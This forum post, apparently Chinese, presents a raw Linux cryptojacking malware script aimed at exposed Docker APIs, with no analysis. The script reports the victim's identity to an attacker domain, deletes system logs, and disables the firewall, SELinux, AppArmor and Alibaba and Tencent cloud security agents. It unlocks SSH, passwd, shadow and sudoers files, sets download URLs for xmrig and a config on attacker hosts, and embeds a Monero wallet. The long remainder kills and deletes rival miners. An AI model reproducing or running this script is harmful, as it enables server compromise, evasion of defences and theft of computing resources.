收藏文章 楼主

docker api 漏洞入侵控制shell脚本

版块:shell   类型:普通   作者:小绿叶技术博客   查看:1397   回复:0   获赞:2   时间:2021-05-27 00:22:50

#!/bin/bash

us=$(id)

curl "http://oracle.zzhreceive.top/b2f628/idcheck/$us" >>/dev/null

ulimit -n 65535

export MOHOME=/usr/share

mkdir $MOHOME -p

if [ -f "$MOHOME/[crypto].log" ]

then

    echo "process possible running"

    current=$(date +%s)

    last_modified=$(stat -c "%Y" $MOHOME/[crypto].log)

   if [ $(($current-$last_modified)) -gt 600 ]; then

        echo "no miner process running";

    else

    echo "miner process running"

    exit 1

   fi

else 

    echo "miner process not running"

fi

rm -rf /var/log/syslog

chattr -iua /tmp/

chattr -iua /var/tmp/

ufw disable

iptables -F

sudo sysctl kernel.nmi_watchdog=0

sysctl kernel.nmi_watchdog=0

echo '0' >/proc/sys/kernel/nmi_watchdog

echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf

chattr -iae /root/.ssh/

chattr -iae /root/.ssh/authorized_keys

rm -rf /tmp/addres*

rm -rf /tmp/walle*

rm -rf /tmp/keys

if ps aux | grep -i '[a]liyun'; then

  curl http://update.aegis.aliyun.com/download/uninstall.sh | bash

  curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash

  pkill aliyun-service

  rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service

  rm -rf /usr/local/aegis*

  systemctl stop aliyun.service

  systemctl disable aliyun.service

  service bcm-agent stop

  yum remove bcm-agent -y

  apt-get remove bcm-agent -y

elif ps aux | grep -i '[y]unjing'; then

  /usr/local/qcloud/stargate/admin/uninstall.sh

  /usr/local/qcloud/YunJing/uninst.sh

  /usr/local/qcloud/monitor/barad/admin/uninstall.sh

fi

setenforce 0

echo SELINUX=disabled >/etc/selinux/config

service apparmor stop

systemctl disable apparmor

service aliyun.service stop

systemctl disable aliyun.service

ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %

rm -rf /usr/local/aegis



MOxmrigMOD=http://85.214.149.236:443/sugarcrm/themes/default/images/mod.jpg

MOxmrigSTOCK=http://85.214.149.236:443/sugarcrm/themes/default/images/stock.jpg

miner_url=https://github.com/xmrig/xmrig/releases/download/v6.10.0/xmrig-6.10.0-linux-static-x64.tar.gz

miner_url_backup=http://oracle.zzhreceive.top/b2f628/father.jpg

config_url=http://oracle.zzhreceive.top/b2f628/cf.jpg

config_url_backup=http://oracle.zzhreceive.top/b2f628/cf.jpg

WALLET=43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz.crondk3

VERSION=2.9



function FixTheSystem(){

echo "begin FixTheSystem"

tntrecht -i /bin/chmod || chattr -i /bin/chmod

setfacl -m u::x /bin/chmod

tntrecht -i /bin/chattr || chattr -i /bin/chattr

chmod +x /bin/chattr || setfacl -m u::x /bin/chattr


SYSFILEARRAY=(/usr/bin/apt  /usr/bin/apt-get /bin/yum  /bin/kill /usr/lib/klibc/bin/kill /usr/bin/pkill /bin/pkill /sbin/shutdown /sbin/reboot /sbin/poweroff /sbin/telinit)

for SYSFILEBIN in ${SYSFILEARRAY[@]}; do

tntrecht -i $SYSFILEBIN 

chattr -i $SYSFILEBIN 

setfacl -m u::x /bin/chmod 

setfacl -m u::x $SYSFILEBIN

chmod +x $SYSFILEBIN 

chattr +i $SYSFILEBIN 

tntrecht +i $SYSFILEBIN 

done



SYSTEMFILEARRAY=("/root/.ssh/" "/home/*/.ssh/" "/etc/passwd" "/etc/shadow" "/etc/sudoers" "/etc/ssh/" "/etc/ssh/sshd_config")

for SYSTEMFILE in ${SYSTEMFILEARRAY[@]}; do

tntrecht -iR $SYSTEMFILE  2>/dev/null 1>/dev/null

chattr -iR $SYSTEMFILE  2>/dev/null 1>/dev/null

done


setfacl -m u::x /bin/chmod


}



kill_miner_proc()

{

netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %

netstat -anp | grep 140.82.52.87 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %

netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %

netstat -anp | grep :23 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %

netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %

netstat -anp | grep :143 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %

netstat -anp | grep :2222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %

netstat -anp | grep :3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %

netstat -anp | grep :3389 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %

netstat -anp | grep :5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %

netstat -anp | grep :6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %

netstat -anp | grep :6665 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %

netstat -anp | grep :6667 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %

netstat -anp | grep :7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %

netstat -anp | grep :8444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %

netstat -anp | grep :3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %

ps aux | grep -v grep | grep ':3333' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep ':5555' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'kworker -c\' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'log_' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'systemten' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'netns' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'voltuned' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'darwin' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '/tmp/dl' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '/tmp/ddg' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '/tmp/pprt' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '/tmp/ppol' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '/tmp/65ccE*' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '/tmp/jmx*' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '/tmp/2Ne80*' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'IOFoqIgyC0zmf2UR' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '45.76.122.92' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '51.38.191.178' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '51.15.56.161' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '86s.jpg' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'aGTSGJJp' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'I0r8Jyyt' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'AgdgACUD' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'uiZvwxG8' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'BtwXn5qH' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '3XEzey2T' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 't2tKrCSZ' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'svc' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'HD7fcBgg' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'zXcDajSs' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '3lmigMo' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'AkMK4A2' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'AJ2AkKe' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'HiPxCJRS' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'http_0xCC030' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'http_0xCC031' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'http_0xCC032' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'http_0xCC033' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep "C4iLM4L" | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | awk '{ if(substr($11,1,2)=="./" && substr($12,1,2)=="./") print $2 }' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '/boot/vmlinuz' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep "i4b503a52cc5" | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep "dgqtrcst23rtdi3ldqk322j2" | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep "2g0uv7npuhrlatd" | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep "nqscheduler" | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep "rkebbwgqpl4npmm" | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep -v aux | grep "]" | awk '$3>10.0{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep "2fhtu70teuhtoh78jc5s" | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep "0kwti6ut420t" | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep "44ct7udt0patws3agkdfqnjm" | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep -v "/" | grep -v "-" | grep -v "_" | awk 'length($11)>19{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep "\[^" | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep "rsync" | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep "watchd0g" | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep "158.69.133.18:8220" | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep "/tmp/java" | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'gitee.com' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '/tmp/java' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '104.248.4.162' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '89.35.39.78' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '/dev/shm/z3.sh' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'kthrotlds' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'ksoftirqds' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'netdns' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'watchdogs' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'redis2' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep -v aux | grep " ps" | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep "sync_supers" | cut -c 9-15 | xargs -I % kill -9 %

ps aux | grep -v grep | grep "cpuset" | cut -c 9-15 | xargs -I % kill -9 %

ps aux | grep -v grep | grep -v aux | grep "x]" | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep -v aux | grep "sh] <" | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep -v aux | grep " \[]" | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '/tmp/l.sh' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '/tmp/zmcat' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'CnzFVPLF' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'CvKzzZLs' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '/tmp/udevd' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'sustse' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'sustse3' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '2mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '2mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'cr5.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'cr5.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'logo9.jpg' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'logo9.jpg' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'j2.conf' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'luk-cpu' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'luk-cpu' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'ficov' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'ficov' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'he.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'he.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'miner.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'miner.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'nullcrew' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'nullcrew' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '107.174.47.156' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '83.220.169.247' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '51.38.203.146' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '144.217.45.45' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '107.174.47.181' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep '176.31.6.16' | awk '{print $2}' | xargs -I % kill -9 %

ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs -I % kill -9 %

ps auxf | grep -v grep | grep "pool.t00ls.ru" | awk '{print $2}' | xargs -I % kill -9 %

ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{print $2}' | xargs -I % kill -9 %

ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{print $2}' | xargs -I % kill -9 %

ps auxf | grep -v grep | grep "zhuabcn@yahoo.com" | awk '{print $2}' | xargs -I % kill -9 %

ps auxf | grep -v grep | grep "monerohash.com" | awk '{print $2}' | xargs -I % kill -9 %

ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print $2}' | xargs -I % kill -9 %

ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{print $2}' | xargs -I % kill -9 %

ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{print $2}' | xargs -I % kill -9 %

ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{print $2}' | xargs -I % kill -9 %

ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print $2}' | xargs -I % kill -9 %

ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print $2}' | xargs -I % kill -9 %

ps auxf | grep -v grep | grep "kieuanilam.me" | awk '{print $2}' | xargs -I % kill -9 %

ps auxf | grep xiaoyao | awk '{print $2}' | xargs -I % kill -9 %

ps auxf | grep xiaoxue | awk '{print $2}' | xargs -I % kill -9 %

netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %

netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %

pgrep -f L2Jpbi9iYXN | xargs -I % kill -9 %

pgrep -f xzpauectgr | xargs -I % kill -9 %

pgrep -f slxfbkmxtd | xargs -I % kill -9 %

pgrep -f mixtape | xargs -I % kill -9 %

pgrep -f addnj | xargs -I % kill -9 %

pgrep -f 200.68.17.196 | xargs -I % kill -9 %

pgrep -f IyEvYmluL3NoCgpzUG | xargs -I % kill -9 %

pgrep -f KHdnZXQgLXFPLSBodHRw | xargs -I % kill -9 %

pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3 | xargs -I % kill -9 %

pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo | xargs -I % kill -9 %

pgrep -f mwyumwdbpq.conf | xargs -I % kill -9 %

pgrep -f honvbsasbf.conf | xargs -I % kill -9 %

pgrep -f mqdsflm.cf | xargs -I % kill -9 %

pgrep -f lower.sh | xargs -I % kill -9 %

pgrep -f ./ppp | xargs -I % kill -9 %

pgrep -f cryptonight | xargs -I % kill -9 %

pgrep -f ./seervceaess | xargs -I % kill -9 %

pgrep -f ./servceaess | xargs -I % kill -9 %

pgrep -f ./servceas | xargs -I % kill -9 %

pgrep -f ./servcesa | xargs -I % kill -9 %

pgrep -f ./vsp | xargs -I % kill -9 %

pgrep -f ./jvs | xargs -I % kill -9 %

pgrep -f ./pvv | xargs -I % kill -9 %

pgrep -f ./vpp | xargs -I % kill -9 %

pgrep -f ./pces | xargs -I % kill -9 %

pgrep -f ./rspce | xargs -I % kill -9 %

pgrep -f ./haveged | xargs -I % kill -9 %

pgrep -f ./jiba | xargs -I % kill -9 %

pgrep -f ./watchbog | xargs -I % kill -9 %

pgrep -f ./A7mA5gb | xargs -I % kill -9 %

pgrep -f kacpi_svc | xargs -I % kill -9 %

pgrep -f kswap_svc | xargs -I % kill -9 %

pgrep -f kauditd_svc | xargs -I % kill -9 %

pgrep -f kpsmoused_svc | xargs -I % kill -9 %

pgrep -f kseriod_svc | xargs -I % kill -9 %

pgrep -f kthreadd_svc | xargs -I % kill -9 %

pgrep -f ksoftirqd_svc | xargs -I % kill -9 %

pgrep -f kintegrityd_svc | xargs -I % kill -9 %

pgrep -f jawa | xargs -I % kill -9 %

pgrep -f oracle.jpg | xargs -I % kill -9 %

pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN | xargs -I % kill -9 %

pgrep -f 188.209.49.54 | xargs -I % kill -9 %

pgrep -f 181.214.87.241 | xargs -I % kill -9 %

pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ | xargs -I % kill -9 %

pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj | xargs -I % kill -9 %

pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK | xargs -I % kill -9 %

pgrep -f servim | xargs -I % kill -9 %

pgrep -f kblockd_svc | xargs -I % kill -9 %

pgrep -f native_svc | xargs -I % kill -9 %

pgrep -f ynn | xargs -I % kill -9 %

pgrep -f 65ccEJ7 | xargs -I % kill -9 %

pgrep -f jmxx | xargs -I % kill -9 %

pgrep -f 2Ne80nA | xargs -I % kill -9 %

pgrep -f sysstats | xargs -I % kill -9 %

pgrep -f systemxlv | xargs -I % kill -9 %

pgrep -f watchbog | xargs -I % kill -9 %

pgrep -f OIcJi1m | xargs -I % kill -9 %

pkill -f biosetjenkins

pkill -f Loopback

pkill -f apaceha

pkill -f cryptonight

pkill -f mixnerdx

pkill -f performedl

pkill -f JnKihGjn

pkill -f irqba2anc1

pkill -f irqba5xnc1

pkill -f irqbnc1

pkill -f ir29xc1

pkill -f conns

pkill -f irqbalance

pkill -f crypto-pool

pkill -f XJnRj

pkill -f mgwsl

pkill -f pythno

pkill -f jweri

pkill -f lx26

pkill -f NXLAi

pkill -f BI5zj

pkill -f askdljlqw

pkill -f minerd

pkill -f minergate

pkill -f Guard.sh

pkill -f ysaydh

pkill -f bonns

pkill -f donns

pkill -f kxjd

pkill -f Duck.sh

pkill -f bonn.sh

pkill -f conn.sh

pkill -f kworker34

pkill -f kw.sh

pkill -f pro.sh

pkill -f polkitd

pkill -f acpid

pkill -f icb5o

pkill -f nopxi

pkill -f irqbalanc1

pkill -f minerd

pkill -f i586

pkill -f gddr

pkill -f mstxmr

pkill -f ddg.2011

pkill -f wnTKYg

pkill -f deamon

pkill -f disk_genius

pkill -f sourplum

pkill -f polkitd

pkill -f nanoWatch

pkill -f zigw

pkill -f devtool

pkill -f devtools

pkill -f systemctI

pkill -f watchbog

pkill -f cryptonight

pkill -f sustes

pkill -f xmrig

pkill -f xmrig-cpu

pkill -f 121.42.151.137

pkill -f init12.cfg

pkill -f nginxk

pkill -f tmp/wc.conf

pkill -f xmrig-notls

pkill -f xmr-stak

pkill -f suppoie

pkill -f zer0day.ru

pkill -f dbus-daemon--system

pkill -f nullcrew

pkill -f systemctI

pkill -f kworkerds

pkill -f init10.cfg

pkill -f /wl.conf

pkill -f crond64

pkill -f sustse

pkill -f vmlinuz

pkill -f exin

pkill -f apachiii

pkill -f svcworkmanager

pkill -f xr

pkill -f trace

pkill -f svcupdate

pkill -f networkmanager

pkill -f phpupdate

rm -rf /usr/bin/config.json

rm -rf /usr/bin/exin

rm -rf /tmp/wc.conf

rm -rf /tmp/log_rot

rm -rf /tmp/apachiii

rm -rf /tmp/sustse

rm -rf /tmp/php

rm -rf /tmp/p2.conf

rm -rf /tmp/pprt

rm -rf /tmp/ppol

rm -rf /tmp/javax/config.sh

rm -rf /tmp/javax/sshd2

rm -rf /tmp/.profile

rm -rf /tmp/1.so

rm -rf /tmp/kworkerds

rm -rf /tmp/kworkerds3

rm -rf /tmp/kworkerdssx

rm -rf /tmp/xd.json

rm -rf /tmp/syslogd

rm -rf /tmp/syslogdb

rm -rf /tmp/65ccEJ7

rm -rf /tmp/jmxx

rm -rf /tmp/2Ne80nA

rm -rf /tmp/dl

rm -rf /tmp/ddg

rm -rf /tmp/systemxlv

rm -rf /tmp/systemctI

rm -rf /tmp/.abc

rm -rf /tmp/osw.hb

rm -rf /tmp/.tmpleve

rm -rf /tmp/.tmpnewzz

rm -rf /tmp/.java

rm -rf /tmp/.omed

rm -rf /tmp/.tmpc

rm -rf /tmp/.tmpleve

rm -rf /tmp/.tmpnewzz

rm -rf /tmp/gates.lod

rm -rf /tmp/conf.n

rm -rf /tmp/devtool

rm -rf /tmp/devtools

rm -rf /tmp/fs

rm -rf /tmp/.rod

rm -rf /tmp/.rod.tgz

rm -rf /tmp/.rod.tgz.1

rm -rf /tmp/.rod.tgz.2

rm -rf /tmp/.mer

rm -rf /tmp/.mer.tgz

rm -rf /tmp/.mer.tgz.1

rm -rf /tmp/.hod

rm -rf /tmp/.hod.tgz

rm -rf /tmp/.hod.tgz.1

rm -rf /tmp/84Onmce

rm -rf /tmp/C4iLM4L

rm -rf /tmp/lilpip

rm -rf /tmp/3lmigMo

rm -rf /tmp/am8jmBP

rm -rf /tmp/tmp.txt

rm -rf /tmp/baby

rm -rf /tmp/.lib

rm -rf /tmp/systemd

rm -rf /tmp/lib.tar.gz

rm -rf /tmp/baby

rm -rf /tmp/java

rm -rf /tmp/j2.conf

rm -rf /tmp/.mynews1234

rm -rf /tmp/a3e12d

rm -rf /tmp/.pt

rm -rf /tmp/.pt.tgz

rm -rf /tmp/.pt.tgz.1

rm -rf /tmp/go

rm -rf /tmp/java

rm -rf /tmp/j2.conf

rm -rf /tmp/.tmpnewasss

rm -rf /tmp/java

rm -rf /tmp/go.sh

rm -rf /tmp/go2.sh

rm -rf /tmp/khugepageds

rm -rf /tmp/.censusqqqqqqqqq

rm -rf /tmp/.kerberods

rm -rf /tmp/kerberods

rm -rf /tmp/seasame

rm -rf /tmp/touch

rm -rf /tmp/.p

rm -rf /tmp/runtime2.sh

rm -rf /tmp/runtime.sh

rm -rf /dev/shm/z3.sh

rm -rf /dev/shm/z2.sh

rm -rf /dev/shm/.scr

rm -rf /dev/shm/.kerberods

rm -f /etc/ld.so.preload

rm -f /usr/local/lib/libioset.so

chattr -i /etc/ld.so.preload

rm -f /etc/ld.so.preload

rm -f /usr/local/lib/libioset.so

rm -rf /tmp/watchdogs

rm -rf /etc/cron.d/tomcat

rm -rf /etc/rc.d/init.d/watchdogs

rm -rf /usr/sbin/watchdogs

rm -f /tmp/kthrotlds

rm -f /etc/rc.d/init.d/kthrotlds

rm -rf /tmp/.sysbabyuuuuu12

rm -rf /tmp/logo9.jpg

rm -rf /tmp/miner.sh

rm -rf /tmp/nullcrew

rm -rf /tmp/proc

rm -rf /tmp/2.sh

rm /opt/atlassian/confluence/bin/1.sh

rm /opt/atlassian/confluence/bin/1.sh.1

rm /opt/atlassian/confluence/bin/1.sh.2

rm /opt/atlassian/confluence/bin/1.sh.3

rm /opt/atlassian/confluence/bin/3.sh

rm /opt/atlassian/confluence/bin/3.sh.1

rm /opt/atlassian/confluence/bin/3.sh.2

rm /opt/atlassian/confluence/bin/3.sh.3

rm -rf /var/tmp/f41

rm -rf /var/tmp/2.sh

rm -rf /var/tmp/config.json

rm -rf /var/tmp/xmrig

rm -rf /var/tmp/1.so

rm -rf /var/tmp/kworkerds3

rm -rf /var/tmp/kworkerdssx

rm -rf /var/tmp/kworkerds

rm -rf /var/tmp/wc.conf

rm -rf /var/tmp/nadezhda.

rm -rf /var/tmp/nadezhda.arm

rm -rf /var/tmp/nadezhda.arm.1

rm -rf /var/tmp/nadezhda.arm.2

rm -rf /var/tmp/nadezhda.x86_64

rm -rf /var/tmp/nadezhda.x86_64.1

rm -rf /var/tmp/nadezhda.x86_64.2

rm -rf /var/tmp/sustse3

rm -rf /var/tmp/sustse

rm -rf /var/tmp/moneroocean/

rm -rf /var/tmp/devtool

rm -rf /var/tmp/devtools

rm -rf /var/tmp/play.sh

rm -rf /var/tmp/systemctI

rm -rf /var/tmp/.java

rm -rf /var/tmp/1.sh

rm -rf /var/tmp/conf.n

rm -r /var/tmp/lib

rm -r /var/tmp/.lib

chattr -iau /tmp/lok

chmod +700 /tmp/lok

rm -rf /tmp/lok

sleep 1

chattr -i /tmp/kdevtmpfsi

echo 1 > /tmp/kdevtmpfsi

chattr +i /tmp/kdevtmpfsi

sleep 1

chattr -i /tmp/redis2

echo 1 > /tmp/redis2

chattr +i /tmp/redis2

chattr -ia /.Xll/xr

>/.Xll/xr

chattr +ia /.Xll/xr

chattr -ia /etc/trace

>/etc/trace

chattr +ia /etc/trace

chattr -ia /etc/newsvc.sh

chattr -ia /etc/svc*

chattr -ia /tmp/newsvc.sh

chattr -ia /tmp/svc*

